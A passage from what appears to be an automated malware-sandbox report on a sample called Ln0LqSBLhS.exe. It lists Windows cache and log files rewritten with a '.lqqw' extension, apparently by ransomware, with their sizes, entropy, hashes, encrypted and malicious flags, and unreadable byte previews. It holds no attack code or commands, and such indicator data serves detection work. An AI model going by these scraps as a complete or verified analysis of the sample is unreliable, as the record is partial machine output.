                                                                                                                                                                                                    Preview: ...D..Z..XU......'....1.Zd.1M.?.i.?`i...Gp..1f.Y..7......x..URt."....a.`......."~d.!L../...u..1j..........R.j~?..V*....p.u..?.S..."..g..;I.$x.t...$7H..X$...}u]*.36......4..q.q\g..T..Y...#..K.LrS.n.2&%...K.0.Q3:.s..&....yW.T.U...rG..kd..D...v..V.|.g......|....[.o.U..%q ....&./.n.k.9E`..,...*}.....c..f..d.$w.m.rg..*..7V.e#/.DW.=.o..G.....j.n._Q.`...d;lD.lqdC...=...`..&..@.....;...Y.._..u.bT..h[n.(...z..AlY.....0l.....].k.N`.`.C{.......%...`\.Fe...7KpkR}S3js?:........oVT2..D*q...x..N.Mt.f..[;..Hs.....c....(.....9....5.....n.xB8~hZ.n2.c.Jt.."......:.{..}i9...7r.V.^Sk-w........R.D....n...._.34.Q.h.K!..k.vO{..1..+../N.6.i...(.y..c..../....G...|....&?.A.}t.^KUi.l.G.....xKO.m.....*.Cj .8zj.yorf...I."....R...9..`.:+...y..."...o.7.`)....M2Z..k..L....d...=2%...id..l.....z......9^.R.2.T.[..9....aV.4.v'..I2.;2.R.\.7...n....3.........k..)..C......A.h3.$P.5......]/...D.$d....%aA........yo..w..?R.>x*....*"(.<.0Q.(S.N.o.<....[.xC..Jn....m;.-...b5VPEI
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows Live\Bici\_06.sqm.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1095
                                                                                                                                                                                                    Entropy (8bit):7.800667798799792
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:SbrjgjPEh3qN1i7D4MwBOWR7Smw1aLOMS8CUGdgJSfY2p/6pSRAIabD:SPg8h6NgdNWR7nnLBCUGq8w2p/EIYD
                                                                                                                                                                                                    MD5:5FA9E97ED49A1C1724D4F5FD607B3946
                                                                                                                                                                                                    SHA1:36E2DCE970EB7E71138E48D4CC686F9E1564683B
                                                                                                                                                                                                    SHA-256:9507D72B5BADB98CB6F4D7CAAB5D0C038D2092F12C129C8AC70F046644703272
                                                                                                                                                                                                    SHA-512:E08B7A65DAB85B17856A2ECE09B98F25D5AC0480FA626AC3ED50BBAA2C70ECEC6C57BD3D9154728CC451137248B6C654C57122CD10ADF21E6A04479DAFDF8BA6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ".F..Y.<g.8.>.8%Y1|*..fo.l..u...,.5.vrt.......8.Q.>..\.[?...s.x.N.k....aV...ho....i.S.}.h.."4G......t/..KQ.h+....`s[...;0pw..jIBu@.d+..g..'....P..........L.\EJ..a6...9s.....1.E.h3./..]he].r.H.#.u;.p&./K....*..K...S.K.....E..-......].x|.n3z.hsg[I.|z].z.}.......V..a.)Y ...L..r..R.....).R.^\.........._8.U...N..E'P-e.Q.o1[d3-.!......Qd.*|....._uu.t6...:..ZF?......KC.W}.9.......;.<.....N...V#..E.<..q.6....yid...p..7KZ..".b.jB}F0..O.h..!..R.3O._...mr.q.7..Gf+....(?B..H...+H)&..^..Cv=.......a.K@.....m._.LaRr/.|n...l../..s...>..l._o....z.iV./^...UdgL...o?.Lu..j..A.d....F..=...H. .2Z..^.W...."._...G....G....T=....L......Z.w..t...}..k> 1{h1.~.t.w..P.............;y.hP..:U.Ly..t4....SOq.........MA...^a.U.,.4C..{...L.. ..|...@..=...g..._...P.......m...0.a.I&..|...A"#........d8.UO._Jr....;....L<I9w~b....(_\....F...sOh..t...G.zo.m.<...&.....u..\kT.d.D....t.Q@.c......S..b.u..X...OW{\...|....&v.H..}.1..Eh...)=z.R.3.@.1....Q....Z........;...!?...Q)@.......&z...Y
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\1033\StructuredQuerySchema.bin.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.9987109225206
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:1fAHdt3rXO1guu1zd//y3U9PUYjd/J1y2psR5lfYwqbLjY:oT1zd/IMNy2KfY/bQ
                                                                                                                                                                                                    MD5:B2BF3EDA4FD02E53488CF5923FC0F478
                                                                                                                                                                                                    SHA1:1303A8FCC92922FC2F332332E1CD0C75BAAAB9E4
                                                                                                                                                                                                    SHA-256:F201064BC783848D3A7477631B43AB30DF352A3AA989FA4BC2153C684882EF5F
                                                                                                                                                                                                    SHA-512:14A360BB05ED023C7636841B8716BCEB84B939550BD25846B45AC5A4C8CA8A5D82BFE88528ADFBB90545477A54B0431CF819E46788C81DBF5A426E37ED29E008
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....).<+b(x|z)....&'t.....(Q.%e/..P.L..._j.yq..J....:....P..GL.Y......5.k........z_c.a.K*..q.>/.b.Q....&...l..c&...8n%n;.........N. ..B.......>&.b.....>..aA.c.t..3....f.......i....... .....Zun/..uc..E<..h..J.J..%Z...]%.Xu...H....v}p.....p=....e....Q.<...!...,vz....O...mq-..:I.i._....h...Mz..n..........O..b,...)..Fm..J.5.T....l.*j....."<.9D`Y...F.#.B<1...<L.a.9nX...f......+U.P.N....af1.....:.A...%..$?.P.z....F>b...j...|!Fmn.k...7...E}..D..r..u.?....R...8.;WY....5N.2k...E.NUo."._L1..=[..=..?.6.~vb0..YI...CQT.iY$._..........>D...,f....[<I..;7..H..,... b...Ce`).2............9`..CXlO..R:K.c...L.I..Y.E6[....E..3.....j..\Qj...\.WY[..v..\....|..A..g9BiD.D....;.LZ...6..W..Bz.A.K=. ..FO..V$;..4L..9...~..m.G.o..^m.T._Z.!c.-n......A/.....Kv..m"I;.~.`....-b>..sa.~.<... .7./J3V.G.t...._....b;..i.E.r......pJ...Q....X.Nv.4T...C>..Y....J.7...%d~\y...........7d....i...j.MA...|I.G......d.8m[.._..%.:...C........:..S`2.=...=....DI....`... C.X"A...Xy.[D1^..`
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Caches\cversions.1.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16713
                                                                                                                                                                                                    Entropy (8bit):7.987074375137794
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:y7o5gVO47NqPtGZrLH7A5UOsyJpnP6yxmyZJarNpFjkllaRZUIQd:H5gjq0Zv85UOsCn8AkNp1kllaRlQd
                                                                                                                                                                                                    MD5:4F6CDC70F148B3170908EF1D17D5BB10
                                                                                                                                                                                                    SHA1:6F4725F2D9ACF0FA05E69755F6F40B5FF2C1A6E2
                                                                                                                                                                                                    SHA-256:B9A7D41CB19D408CEAFC3227D5CFE18C9FB2CEB67B72F8011D008E471CC8A07C
                                                                                                                                                                                                    SHA-512:C5C7F34FDA5712C132F7D51E2E52BCC55A52A5E382D012182C290E016BD853AAC264B7E08B152C749EF38D0DE61B12A300BAF3B5263CE2B791D16AAB3E64D920
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...d..4.....!.c..w..7:.<.."IS...>...../.!9..5. .}hj..Z...._.Q...6..?.....=.....f....-.=....../Q...9..C.o8.M.l}..|.....s{...uZ.j... l......i....n....&.y.c.O.}.M'r.*dtM..3^...@X.}......w.R.Y...j'.V.....pq.b...<...2.\Iu.B.....l...S.B.......yp....o...d....1J.Z?.6..M}*.%O\&..(lw..\.@.Q Tm9.79x.L....u.....+.aj.5.2n.Z.%.T.n...5.82E.s)y....,.C..6J^_.B.........GL7..........._...c.....BO+9Jc...]f ..IX.C..N..,.....'y....].T_.@.G..m.;&,....:i......Z.'.R..o'm.....P78.d.H=4....L4sk..f.z~..._..P...Bz..8..u.."..U........Y....3....y._.p...N...T...B....xl...K\..G.Fd.+..z...4.l..m......}..."...}D...ze.~...cXa.(.>n.....B..&...i.!.....Ph.O..4p.Z(fj........,....#.g.....4.d..C..N..|..#7...@7Ymx..'e.v.6uN'dw...T..g$..7...J..W.D2....C.[..&.v..)...)/pu..C........x.2...D. o.$.....Wi@..).q9.D..A.qjY...97....(.....e"9.....&.L...pR.......^..<8.*8.x.Nf...)...+Z...cFv......m......r.f.C.-....N....H...%......fN..k.5Z_.,u.G....S.:7....*7.%)......W...
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Caches\cversions.3.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16713
                                                                                                                                                                                                    Entropy (8bit):7.989144484808877
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:WN5Y1OqrY3z1qqlGp8XOWvxHqfaAfhoURafOgVFZYvi7dtv:wC7rCoqlG+15HqzCURIOCHY6vv
                                                                                                                                                                                                    MD5:80A50E20433A6C8825926CDFEDAA3D90
                                                                                                                                                                                                    SHA1:504E81E6CBFC799BE3812BE41F43C86399452F43
                                                                                                                                                                                                    SHA-256:C719972700440B30DCDA4A9E8616B81B426DCB80EA74D0D467E494D33903547A
                                                                                                                                                                                                    SHA-512:F11DEF505E0C255FE76D45C9EED3EDDA2C59A1810A149FF275B443136706BBF58FD206164216372CCE45A96B61FDDEDB380AB90B438452730A24E9713A6E05FD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Z.X.....)...].o.n...........e.Y.....vb].I ..p.....ao(.F1.X. .bO..t6%..g-....j.-....3.V.C.i.nm.cg}w~UJ^..j.h}.f..G....-.,1.E1......%.,..).....-7.qg.'9...D..L.....m...N.{....L4...D........o..t8...P..h#c.l.*.q..bgz}M....'.........H1.E_.[a...M.... ..mQ......J...Uw ..IX.]5.y.|...H?=.d..X.{....ntx.9.Z.4$.&Y.p/.~....R7..p4z.)ff..m...#.........,.3.<T...nVUpz\L.P...:....;"..v6E......5C..?.x...7..lG...<...._h._..K'@#,.......k.q..#..k...z...TO.......g....G[t(....Z.45...o(.S.1..{...1..Q..(..#...x...pZP>.$.Op;..q...:....5...&...|Vl"?_{.>c.......)..z.9.]+..an.4_.L..)._L1..s.E....$.....U.R..}..so..J.D.k.i.c.........[K...d....7.*...E............U.g...|...;n.Q/.z6.A\............ZX.Y!.!...y3.}.?..'NG:.gA.M.[J.......?D..y..N...Ot..Og..S."_R:..... &.....)W.8...."*..bE...!...P.N..;;~..._......=.l^.....6.Hl&.fxOl..C..|.Y...R....1.v9_.[..V.......1.....&.1......D..z.6...f}Xh...+......`...0|.....M..V.{.hn.B...ja.T.M.B..z..2M...o.V....I\.Z.'.x.b....=?.jr.cWp..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Caches\{1451C5E2-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.99869114601869
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:Yfk1BVx5W1lefOo0wnOWUJUq15POGWeCs+QctkgDXZJ:Ygx5gleAwZiL7XWeCp+GJ
                                                                                                                                                                                                    MD5:1C87F731702832A1FB14ED4242AF077A
                                                                                                                                                                                                    SHA1:901D2DCB6DB1E5CED802D94B241029A1440A152D
                                                                                                                                                                                                    SHA-256:89A4EC9A79ADF5BCB177B4BC6BEA0144A4CFF81D474D4081932EB35278F32E2B
                                                                                                                                                                                                    SHA-512:84897FF46EA1706AEA6662CF42EEC533411EF9DE75656BC592F3A79246CFE96B1C345E090DE86B2F21AA10BDE61476058247CFFE43C2F79016DB0B6DF19D564F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: *.,..yQ.al@......I...G'.e..R..e.]Ek88#.q...3{..H.bWI....=.....4...ap...X< ..!.9#l..{i^.s.4.*u.F/.r.ZIV.-.".o..?r.p.tw...I.r......bqp.2.....Q...-].@....x...\.q4....:.J%....=.4f3...ej%,.L*.0..+._..q.U.10......#.:...c.!....hZT9.P.g8_..\.....2.......O..Bl.._.w=|YB%.q.u%G...V@u@.U~..............o=lp.......... 1/.L&.?.........nS\..u..2...b~+..j.|GzD.2z.m.ql._H..p.9^...}J.y..ML....*2..5=4..Z. ..E.s.....,.g".".%...0.<+ml..B........T0PP..D.J....R....Hm.Gn.C...y..qf...t.+.'.......3....I=.l!. ......N.O..p..B......1#.<^_.*.8.6.q.:s.;n....2j.E..g.S!......VhW...S...M.M.......>%...E(...R.....;*..|..E.!B...t.}.....p......K.........I[..2)7....j.lK&.F._..hf.)...t........o.+b..C..'.}.0|-0.G..s........7..L.u.G.}.>].%.....$.H.Zc.r...<.Zz.2...g..W.T$4[D..S..w....G.~...h;..m.+..K|K.2..H.O;~...K...d0I.Q<.9.x.....%#..p.l..CR..-.......dD..BR. .Y.......\.PaDs'...$..v..)?}e......wyw3.g).E{-..9a.-q.....j.pUpq.3z.$.w.D.P..K....7.u.L.!e;3..P.;A.._2.Q..o..}..].G*.L
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000016.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):106041
                                                                                                                                                                                                    Entropy (8bit):7.998478818209185
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:ESJEElm4/j0SRqrXxZCIhNrSKnq4KDoHBsrP:cybjqr31v1KDohsrP
                                                                                                                                                                                                    MD5:1DB0DEAFE925DA9824924B0022485D55
                                                                                                                                                                                                    SHA1:AFE842B9893E5CA6B88670CD0F532A07A31C90DA
                                                                                                                                                                                                    SHA-256:59AA071941BFCB4530D08DEA5A303D3D1909ED94BFB49D61C93D9E901FF068C1
                                                                                                                                                                                                    SHA-512:665C802F78851DB6EB13275AF30F160947A0A222434089B3C7863A8BE9C510FEAD57621458C3C29F379893CC41731D94C6CECFF7472239C7634F1E28838FC7D0
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .......).]<`8.R..p..E.q=.;mZi..`..j..o......>.i4.EK...wvh.A.2.l(...............~.E.]|......[.>p..oj;.Qb..Rk.}.._.q...5r0,....I...X.GqDm....J0...!9..M..<d{..>StVl...A.[C..=.g...8..4..UQ%W.F/....w.B.&.<..WD.o.(=.l.._..q.Q...G'.JO..q[K.z.$...?>.{.j.0.q..F#..}[.i...{4{..).....b..V.9/...M.S........ ........~^..R.o/Vj'...*!.i..o.m...]~3@0.[.Q......6."i..j.ZV....6a.+.'%..A...3...M'..{...4Z.....G.p......^....sncp.#.R........bN:hG.Y<.M.Co1|.A...6....5,.f.F..X...x.h/....?.......x..If..l..6_z.h...\=..j...V...|ROk......4\.-.v.......G.gJn"..K.W..vV8..D.SF....T..Q.....Oy.w........{..^../;">:K...k..&....iY~z..([8...F.<6...=..]..m..F2YM......8..._.y.5......Q-.].Br&...5....5il..V.x...O.. .U.%X.......~G.vDX.g.7......Ci.$..z:O;..3...[~.S...z~..N...ST..<...e. Y..3D'.i.n...Kz..E.E.h..../wg.Z......M."%.._cq...nh....L/.h..../.7..YK4..........8....e.Mm,.....A$.....$....n\..9\...h....BD.Sv..........:.....P..6...r.I.0.&...=.E....n;=Y|<Y...M(C{.0.Dk..Y...i.....V........
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000018.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):106329
                                                                                                                                                                                                    Entropy (8bit):7.998217602784105
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:2EbjNAY5b1lwis2Al8IThHOLCHYd2pO317afJe:2Ed7lwiMThYPd2pO3RWe
                                                                                                                                                                                                    MD5:1A399968AEDE02A52B6214252CFAECD9
                                                                                                                                                                                                    SHA1:A9F46EEDEC908A0DC63A4EF3241B44AB163C5639
                                                                                                                                                                                                    SHA-256:855E3EC56F836AF6AEE717D36D04107EEE3282C21D3CA0577DCD656F9B46624F
                                                                                                                                                                                                    SHA-512:399F2D4DC82029F4DB4230669FDCDDDDE981BB8D1CD2400312C4C7340C96983373B27018F3D261022ED04B47B1498EF6F4A9EE0E31D4F581873D5D7BF2AC39E8
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: N.....N.aPc..Q......\m92a..F%.E...;_.1.V.\C.&.T...O..~...ew...c.Q..1..6.!.........P...w..."Ne.W.o.y..f.{..|......R.....h.......C..|C. !..i...F.0#...gX..D.;.k........\-..'..z..E.....0.h.3...6..2.G..b0..t...E.8....P+........3{3].../.]...P.....A%.H...j.N.L.m}..,..)..k.l...K../.).....E`.N..w..G....f..{.uw........U..|.T..e.c..0..xe.s..R.....9.$....4=....~u..i4.Ia.RDJ>.Ku..c.1..&.^..i..U.(.W!o........50.Y...<..N..^t..W!-..q..........._t.l..|.2....5..z.IS.xN".~&...z.-.^.....GZ.$.`...w..a-fz.M......y.I.{.L..Z.+.N...#..C.....M.J..u...CY&... ..m..0.>4._.O.;B9.A.MH.]...b.(.qX...n..a)..j.....5^.1L..B.....L.!.,T...4......o..d... a......'..'._9...z..X"D..W...`..fR.I....x....I!q........%..#..Qrr...`2.....O.....3)...T.V0.J..>......8_....W..$...7.i?...t.f.6.`..8...`R._........m.vp.E#.ma.|.(..<;.)U..k.h......3&b2..v......}..z.G!..|kd0ib!.3=P..h..\.FYok.{.....LB...@...V..ZyS.9u..F....Vg.O...?.fI.+.<.1.......... FOH4.?!...s..O$.t......b...f..L...z,P.}[......}.E..w
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000019.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):105089
                                                                                                                                                                                                    Entropy (8bit):7.998230815584547
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:hq0mUnLR5n8R99MsjVY3F4HF/VZVbBCUMmK+ALdzeOr6co+BcFVhvyl3cm:YlULRF8R9FZY3F6Fd/bpMl+wdagCtVgB
                                                                                                                                                                                                    MD5:0C26F061CDC37F64FD0159F2CED0CDE9
                                                                                                                                                                                                    SHA1:1403DC537F8097D284C65047ABD3AF568A04965B
                                                                                                                                                                                                    SHA-256:9E80D05A294C0641F178278C4B37F38D04570B1ADA38AE035EE1D8D16088C400
                                                                                                                                                                                                    SHA-512:494F337036723C5BA781DFDFB2B444D0EB277BE42E8578F888A9C5E32DF6FE46E6526BE86E0DB8288107650CAD03993470E8EDBCFF233E26476F0FAE0F40D686
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ^.h.8..oNz?..].9M..Y...e!.@k..H`y.......2;X[....k`3.&p.2.P.....Y..(...Qe.D.1....Wa.........~(..V...(.(.:o...$...#...Zj..%Z.a?..OI.Mr%.>....6...Otoc.P...'(J....J.V..*.....h.._..Q....=.+.1KmW...;Y..*._o.....Q ..f...u..ab.Ig.>..tH..r.V......_..5.a.,o.m.G..q.R.BdmI..........;&f.KN7Ua..:e..n.......^-..y.o.n\,q.o^I.3......`.,..H.U.>..UN9...J.!C9.,..t).\r.hu....:..n.....6...w.e..7....L+.|.n...67..NZ.....+R-d..D.vV...NK.@(._...`.2..@.V.B4...q..m;....G...;.F.9A.w7.:r.ZE{.9.I.....<....t..?5;q..}#..JP...r....H....K.....01Tc..*.....7...9..79G...".....F.:..).fm'z^j.\/2.x..`......|..OV..qKO....f.V(N.|..Jg..Z.DmM..{......I;94.(>.v.......1...V.}.V...r.8.6.J..7Yq...sFj.[..&...^fI5c. ....d.!.t.~..8b.j.Z.......HKL....~z..Al.k.w..g&.wPe.*..:...q.{..C..^.^.._;B`s..;."|...D..8...(.........?.`6/.Yx.....b.41.#>....l...^.G..!t.....5....w.p..r@.].2...E.....4aRO.[..l.H..zr...n|....s....ni.q........$]..o.8}..]..H.3..s.W\.24.OQ.e..{.U=......o.q.........N.n.(.!.f.p.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000006.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):103193
                                                                                                                                                                                                    Entropy (8bit):7.998126808490484
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:kcofl1mr6m17FIZSU7+RXXp71pkpiHj8uVWxpdJI9XgFRZ5cURHPmSa1Zc:No9orhS4US3h6qdVWvdKqXZy+hIc
                                                                                                                                                                                                    MD5:2093077C47A99832A8746C433918717C
                                                                                                                                                                                                    SHA1:88446C6CA4EBCB18435C0E5EA65B6179E22CCC4F
                                                                                                                                                                                                    SHA-256:AE077C4DE1EDD0F36C21FEDEF4F045F2CB97526857768FA4ADB2B2C904298347
                                                                                                                                                                                                    SHA-512:BDBAD78A37C287EF82747EBF3BE50B610CDB8C0F387A364376ED8E8995DDC191F3C32AE144737926214E11E55A16F182DA4654F6FAD751A84F950B93D789560E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..5.h6.A.......Hx.!...U(j.\.'..R...O.8....S.e....Q......E..cH..-.....O.T..E.1.'.zB..NEO+..<...9..N...e[.[...bf._...>.t....M..-<.E..P.O."....+.G.:..w...I...dh.....&....)...O..;....p2!.Ik.5..to.|.AS.v,.}k..[......y..q{.&z&mt..u.p...t...M.....\..e.y..cT..dQ57.q..V..B. Wt.(....'Qd.t...<.q....$...+...S{......H.Cb(.aW;.a.^uH.....Jy.....;C.=rnx!|.t..9.3.]...+../...1../.U{.......)E?.....y`_.ny..*E....I..6...#.....EQ.W....:...Et..../9.......:..../8..g.`.F..ZKdU.......A.M.K...)?W..H....8.|...$l.....FhW..%.K....N.EB..F&3>..D.l?.3...#.z..'.Vm._Q...T.....L....3.}....F.m....Q..|9$...v@xym..q.$RL......!.y.."....(..S./.!.`...k.a.f...Y.......{<.d...m+l.A}8..C.+..?.[}{.+...S})...+..&}.aP..AAyX.....fbx1......?.+....mVE}z.'.i...S0LCt..T.n........".RV|.bWc.q..]....e|.]..n!..w...m...U...R..|.}...g.S4Ws.B.2...L?*MC..b9..'T.aw...!.h...d...Yn.|..m^...............h.....t....+..h....1..5m..b...^U....H....... [.=.r1)........nUk.C8R....0*"o.+N.f...V.%u.M.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):115401
                                                                                                                                                                                                    Entropy (8bit):7.998458132449234
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:V7AH/NR8s/jJhcJdOZLyxKnfKovFM5m6EJCy9hMqzt:FS/ss/jcJgeEVKs64VOQ
                                                                                                                                                                                                    MD5:2A88532565C4135A5A646A815F0CF488
                                                                                                                                                                                                    SHA1:D3724B15FDDCD9F7E2778FC07A00FBBB966259A5
                                                                                                                                                                                                    SHA-256:EE1EEBD413A5BA45B1958F8B63A7550CE05368E0B6043888657E76E16C99FA2C
                                                                                                                                                                                                    SHA-512:CC9FCCA40D0761AA159325FBD091E06924F2B85CDEB3A9603D57BD52B7322E46A96DA4038C5E920A1ACF0260E90BC6A1C4951AB361EC2BFB0182DFB9EC3385F7
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....@O.V"..n2z....u....#..>z.1Qh......E..."r....oc...t...D.(.=4;([.).W@F..q..*..T|*.b..U.`~[k<.%^=.E.......<.Zx...cS.u..T.R.SH..5."w..._.i...?d%..n...K.9.$.B'.....>y.....D/.!....-u.uW.k..i...[.........D.Q9Z.8.B]?.x.:.+.x.......I....*...,.o.W..9.u.........:L...g0.I,..r:g.?.GS...c..#.......w..f...?N./.....T...4.Zk ......Cx....Z:#I)...0...A.........hH...P...2.....8....ep....h.k...;I..-...pI.)..eC....4..m...._.......0..}....0.t...V....).........s..Q....~~l.a.......Q.Y".........Zu......4..M...j.Q....V...eXw..<.b.b...S.eB...K........9A.+...;....p.^l..'6.`j..K..P....#I(...y.R.`.x:M...fZ%b......wI.*~...*..[...(..D.y7....m.]l.`Y...eb{>m...C"..~h.%A..k..;...A..?f.ct....eTOyE.9..0......e.z.Q...F...=.d..R.3...=u...%................X.K.....d..\\....@U[-.t..x......Ap..W.:..Z...5...h.<.U..c.p....5.....=dog....qS@4L...ei1d....b...\...3..{.<...6.....<.&p.Vx'b....q.-.w-..!..S.8~#D.k........l.........}..{.nQ....R7...|....mRp..*<...6.n..+?."US....Y).r
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog.etl.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998808568123559
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:nJyjyp22oIowggQ25Aj3MNpN+2z1gQCTT1QxjGx+ecZ7/IsL:Jyy1gwggQ56gbeLDBL
                                                                                                                                                                                                    MD5:53E957B4D111C3F7C7FE6557E4D5ABDD
                                                                                                                                                                                                    SHA1:6BCAAC35C25F634507DEB8874218DCFD961E73E2
                                                                                                                                                                                                    SHA-256:B44531C838F3C46923B8DB94D4D2774B6DCECBC78A093C6A16D04FAC3B07BAFE
                                                                                                                                                                                                    SHA-512:AB7EE4981400C6508060AFD081CD42AB4F46A7AE829FF81141CECC730FE96F664602EBF4ED6F6D5BEEDE96B45EAA764D1A780AD0F90DF1EFB318E905A16F30AE
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...%.A....-...W...'$.DyZ6;|.}.K._......T....-..5....,..U`......}....L.,.8..L.>.m2.G.U;N#..I.NF...&kT...U8.,....+....O."..#.._.5..^w..\.YU.I...kw..}7.:.S.....,.<.+=$R..R...o...KO"&x..E...9;.$.(P......2t.X.&....N\.Te.G?3n.S...).QF.......jS..RP.;....P.\.M...}uj.d...7..oM`...Q....!.t#o... :..%a5..)J.N.W*F5.....X.....!t...!`m..P6...+...Q6...F..E.]...0.5X.n..SD...T-...mQ.i...U#...((...ta.m..+...o.7..D.......h..&..<!.RGR......b.)#a...|.m..2h.^Mv%..:...{.......C..3lnPL.3.3.u. {....p..3.w.>*..<._...k...#(.E).N...Q}.....R.63..\Q..b,S.....1...FH...4..4..%.g...CM....h .I.,8...Y.?.$.s._D.x..Mn..../.p.=...........V.Q(...D.[....3..dL..J.....O.........Dk....D.z.QD.....P....Ov6..9..y.......U>.......@.gxE\(...yE....7..Q......Yz.(..eU....F...Xp.s..S.<...(.....$w..(......5.R....>.....P....s...]....G_.L`u@D+......#.de..M.. ..,k.......g..&Gs..)...j.]/..t4...:..C.s-|.....1,.*..{f....4....R.b../U...._Q...D./.Sb....%....._..lS........[V>..e.q.9..l].f.c:p..oCL...I.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16713
                                                                                                                                                                                                    Entropy (8bit):7.988831803775051
                                                                                                                                                                                                    Encrypted:false
